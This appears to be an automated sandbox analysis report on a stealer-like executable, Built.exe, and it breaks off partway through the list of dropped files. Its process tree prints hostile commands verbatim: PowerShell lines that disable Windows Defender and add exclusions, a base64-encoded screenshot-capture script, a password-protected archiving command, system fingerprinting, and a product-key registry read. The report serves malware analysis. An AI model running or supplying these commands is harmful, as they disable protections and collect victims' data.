Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 17:29

General

  • Target

    Built.exe

  • Size

    7.4MB

  • MD5

    66438a23be0dac1106efbca725c7be11

  • SHA1

    ab4f676bdf217b71e1b9aa1a41f4df0959930482

  • SHA256

    05d9aa0b53f7c998d325e3439319c85d1056dc9643fa2406599010fac741444b

  • SHA512

    cb783151b16649eb08882e329b10e36202e4303031f827507f03350474ede4b0a02c16a44716dcb625658cac9a3f9c2a63e919528a9aacf295991a9dba9e985e

  • SSDEEP

    196608:1Y8PiLjv+bhqNVoB0SEsucQZ41JBbIM11t5:W8PGL+9qz80SJHQK1Jx1v5

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2264
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2212
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vizgkhtr\vizgkhtr.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A84.tmp" "c:\Users\Admin\AppData\Local\Temp\vizgkhtr\CSCB92A0E1F939F48B381A2197FED496A13.TMP"
              6⤵
                PID:3464
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\66H5N.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI22642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\66H5N.zip" *
            4⤵
            • Executes dropped EXE
            PID:1644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1128
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3356
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:4916
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4752
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4316
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2096

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        e448fe0d240184c6597a31d3be2ced58

        SHA1

        372b8d8c19246d3e38cd3ba123cc0f56070f03cd

        SHA256

        c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

        SHA512

        0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4df4ef707a4d881224b023b119b108e2

        SHA1

        4e7043ec19dd7d0398b8d59db5f56e96f3c65fa1

        SHA256

        40b88b00fed4f927b1c8e77beffac4df496ef4f4c768ba8fb751a9cb415ece61

        SHA512

        54dc66e0cc4bddd984b849d99a505b9639f87bd4beaec4fc2301fbe128bb9168e9c43f2aeed1fa5828b8785ebc7d668c4b2fb1cfa2218f57fe59355d0511f669

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        1a11402783a8686e08f8fa987dd07bca

        SHA1

        580df3865059f4e2d8be10644590317336d146ce

        SHA256

        9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

        SHA512

        5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

      • C:\Users\Admin\AppData\Local\Temp\66H5N.zip

        Filesize

        422KB

        MD5

        d635c445a5219552da7493859e175721

        SHA1

        4df81cc8f1dfbacc75f5fbf6c286d97c56569ae2

        SHA256

        28ec44d0f66fcdb0aa2b9eb07a013054fb19395ff8035a80f6c41e598963e5ed

        SHA512

        ba17006ae72f907b67bb40033c7733fd5c0fab29ae205cfe69d55ce71b64eb0f634c534b75009e668ccd59d55dc5a060f73079c738f53e56c7c40ec572dcb327

      • C:\Users\Admin\AppData\Local\Temp\RES5A84.tmp

        Filesize

        1KB

        MD5

        6eab79250b1c0fb6d75c26cfa040eaab

        SHA1

        1ca9e67ec28729e3c9f3241eed22bb9e1237de34

        SHA256

        d359289791295e75f194e960baf74246477aaf3f4c92a7922919d2bc1139a228

        SHA512

        0028a817c9f1cc1054961a6670f9d32d63d6b2d5679e01761dcd08e7050e81df5461196f9a224947f4a65e1f91d989e5e8937bfd350f595f870bd009eeaa951e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\VCRUNTIME140.dll

        Filesize

        116KB

        MD5

        be8dbe2dc77ebe7f88f910c61aec691a

        SHA1

        a19f08bb2b1c1de5bb61daf9f2304531321e0e40

        SHA256

        4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

        SHA512

        0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_bz2.pyd

        Filesize

        48KB

        MD5

        341a6188f375c6702de4f9d0e1de8c08

        SHA1

        204a508ca6a13eb030ed7953595e9b79b9b9ba3b

        SHA256

        7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e

        SHA512

        5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_ctypes.pyd

        Filesize

        58KB

        MD5

        ee2d4cd284d6bad4f207195bf5de727f

        SHA1

        781344a403bbffa0afb080942cd9459d9b05a348

        SHA256

        2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009

        SHA512

        a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_decimal.pyd

        Filesize

        106KB

        MD5

        918e513c376a52a1046c4d4aee87042d

        SHA1

        d54edc813f56c17700252f487ef978bde1e7f7e1

        SHA256

        f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29

        SHA512

        ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_hashlib.pyd

        Filesize

        35KB

        MD5

        6d2132108825afd85763fc3b8f612b11

        SHA1

        af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0

        SHA256

        aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52

        SHA512

        196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_lzma.pyd

        Filesize

        86KB

        MD5

        5eee7d45b8d89c291965a153d86592ee

        SHA1

        93562dcdb10bd93433c7275d991681b299f45660

        SHA256

        7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9

        SHA512

        0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_queue.pyd

        Filesize

        25KB

        MD5

        8b3ba5fb207d27eb3632486b936396a3

        SHA1

        5ad45b469041d88ec7fd277d84b1e2093ec7f93e

        SHA256

        9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051

        SHA512

        18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_socket.pyd

        Filesize

        43KB

        MD5

        3ea95c5c76ea27ca44b7a55f6cfdcf53

        SHA1

        aace156795cfb6f418b6a68a254bb4adfc2afc56

        SHA256

        7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923

        SHA512

        916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_sqlite3.pyd

        Filesize

        56KB

        MD5

        c9d6ffa3798bb5ae9f1b082d66901350

        SHA1

        25724fecf4369447e77283ece810def499318086

        SHA256

        410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec

        SHA512

        878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\_ssl.pyd

        Filesize

        65KB

        MD5

        936919f3509b2a913bf9e05723bc7cd2

        SHA1

        6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd

        SHA256

        efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3

        SHA512

        2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\base_library.zip

        Filesize

        1.4MB

        MD5

        81cd6d012885629791a9e3d9320c444e

        SHA1

        53268184fdbddf8909c349ed3c6701abe8884c31

        SHA256

        a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd

        SHA512

        d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

      • C:\Users\Admin\AppData\Local\Temp\_MEI22642\blank.aes

        Filesize

        113KB

        MD5

        2f0a9caf2e669729e2cdc3c7d2637827

        SHA1

